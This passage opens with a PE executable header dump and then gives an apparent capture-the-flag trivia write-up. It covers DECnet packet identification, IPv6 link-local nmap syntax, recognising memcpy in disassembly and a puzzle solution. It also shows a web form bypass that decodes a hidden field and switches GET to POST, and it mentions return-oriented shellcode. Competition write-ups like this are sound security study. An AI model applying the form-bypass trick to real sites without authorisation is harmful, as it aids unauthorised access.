MajorVersion: 0x0004
MinorVersion: 0x0000 -> 4.00
NumberOfNamedEntries: 0x0000
NumberOfIdEntries: 0x0001
[ResourceEntry]:
Name/Id: 0x00000409
OffsetToData: 0x000003A8
[ResourceDataEntry]:
OffsetToData (RVA): 0x0003F2E4
Size: 0x0000015A
CodePage: 0x000004E4
Reserved: 0x00000000
##################
# Debug
##################
->Debug Directory
1. item:
Characteristics: 0x00000000
TimeDateStamp: 0x4B7D6E1C (GMT: Thu Feb 18 16:43:08 2010)
MajorVersion: 0x0000
MinorVersion: 0x0000 -> 0.00
Type: 0x00000002 (CODEVIEW)
SizeOfData: 0x00000054
AddressOfRawData: 0x000339E8
PointerToRawData: 0x00032DE8
################
# Load Config
################
->Load Config Directory
Characteristics: 0x00000048
TimeDateStamp: 0x00000000 (GMT: Thu Jan 01 00:00:00 1970)
MajorVersion: 0x0000
MinorVersion: 0x0000 -> 0.00
GlobalFlagsClear: 0x00000000
GlobalFlagsSet: 0x00000000
CriticalSectionDefaultTimeout: 0x00000000
DeCommitFreeBlockThreshold: 0x00000000
DeCommitTotalFreeThreshold: 0x00000000
LockPrefixTable: 0x00000000
MaximumAllocationSize: 0x00000000
VirtualMemoryThreshold: 0x00000000
ProcessHeapFlags: 0x00000000
ProcessAffinityMask: 0x00000000
CSDVersion: 0x0000
Reserved: 0x0000
EditList: 0x00000000
Reserved: 0x00438F8C
Trivia Challenges
Challenge 1
Q: What style of traffic is represented below?
tcpdump -nn -vvv -e -s 1500 -X -i eth0
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1500
bytes
13:47:23.382938 aa:00:04:00:0a:0a > ab:00:00:03:00:00, ethertype DN
(0x6003), length 50: endnode-hello endnode vers 2 eco 0 ueco 0 src 2.522
blksize 1498 rtr 0.0 hello 10 data 2
0x0000: 2200 0d02 0000 aa00 0400 0a0a 03da 0500 "...............
0x0010: 0000 0000 0000 0000 aa00 0400 0000 0a00 ................
0x0020: 0002 aaaa
Since this was tcpdump output, the easiest way to solve this was by checking out the tcpdump source code. A quick grep for "endnode-hello" revealed that this code was printed from the decnet dissector. The answer was decnet.
Challenge 2
Q: Why do you need "%eth0" in the following command:
nmap -6 fe80::a800:4ff:fe00:a0a%eth0
The problem is that link-local addresses are interface specific. In order to talk to to the host at fe80::xxxx:xxxx:xxxx:xxxx, you must indicate which interface it is on as well. The way to do this on the Linux platform is to append a "%" followed by the interface name to the address. In this case, we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". So the answer to this challenge has been Link Local addressing.
Challenge 3
Q: What protocol is used to pass multicast traffic across external network domains to specific hosts?
The answer is PIM-SM.
Challenge 4
Q: Identify this libc function
00000000 89C7 mov edi,eax 00000002 89DE mov esi,ebx 00000004 89CA mov edx,ecx 00000006 C1E902 shr ecx,0x2 00000009 F3 db 0xF3 0000000A A5 movsd 0000000B 89D1 mov ecx,edx 0000000D 81E104000000 and ecx,0x4 00000013 F3 db 0xF3 00000014 A4 movsb 00000015 C3 ret
These instructions prepare the source end destination registers with values from eax and ebx. After this ecx (counter) is divided by 4 (shift right 2), that many dwords are copied, and the remainder modulo 4 is then copied bytewise. The db 0xF3 looks a bit strange, but it's just our disassembler's inability to decode the rep prefix. The code is of course the usual memcpy() implementation.
Challenge 5
We didn’t solve this challenge in time and most other teams didn’t as well. If you ask me this has been a pretty stupid challenge and the picture that should’ve been an imitation of http://xkcd.com/195/ looked more like a window of a Swedish house to me than this map (note we all know this xkcd picture of course). Anyway, here’s what should’ve been the solution:
01:09 <%[smp]j5_> exif data was fake 01:09 <%[smp]j5_> and if you called that poor company in colorado, hope you have a good long distance plan 01:09 <%[smp]j5_> goal was to emulate the following picture: 01:09 <%[smp]j5_> http://xkcd.com/195/ 01:10 <%[smp]j5_> NO DUPLICATES and top class (as in Class A IP addresses) 01:10 <%[smp]j5_> arrange them from 0.0.0.0/8 .... 63.0.0.0/8 01:10 <%[smp]j5_> remove duplicates, empty values, and things which aren't companies 01:10 <%[smp]j5_> like Europe (62) 01:11 <%[smp]j5_> and you get... 01:11 <%[smp]j5_> when using the first letter of each company 01:11 <%[smp]j5_> GBAIDBXHDAMFCDDUDNDHMPEAJHIBPDCMBUSU 01:11 <%[smp]j5_> as your answer.
Challenge 6
This challenge presented a simple web application form:
<form action="" method="GeT" name="challenge16" target="_self"> <select name="users"> <option value="Joe">Joe</option> <option value="Bill">Bill</option> <option value="magikh0e">magikh0e</option> <option value="redsand">redsand</option> <option value="chek0v">chek0v</option> <option value="SMP">SMP</option> <option value="monkey">Admln</option> </select> <input name="huser" type="hidden" value="SGD ENQL NMKX ZBBDOSR ONRS QDPTDRS" disabled="disabled"/> <input name="hashKey" type="hidden" value="QGMWNL ITMJ ;W" disabled="disabled"/> <input name="Submit" type="submit" value="Submit" disabled="disabled"/> </form>
By default the submit button was disabled and the user values you could choose were not "admin" or something related. Of course even children can bypass this and so we were presented with the text: "Did you seriously think it was going to be that easy ;P For your Efforts - Challenge Key: trivial6"
So we took a look at the huser value first which turned out to be:
print "".join([chr(ord(i)+1) for i in "SGD ENQL NMKX ZBBDOSR ONRS QDPTDRS"]) THE!FORM!ONLY![CCEPTS!POST!REQUEST
Changing the request to a POST request got us the flag.
Challenge 7
Q: What does the recently popular term "ROS" stand for?
Hint: This is used for bypassing Data Execution Prevention
I’d never heard the term ROS in this context but it was pretty clear that this was about return-oriented stuff. So the assumption was return-oriented shellcode. Sadly this was one of the challenges that slowed us down because of the pickiness of the solution form (case sensitivity, hyphenation... you know what we're talking about). Finally the correct answer was Return Oriented Shellcode. *shrug*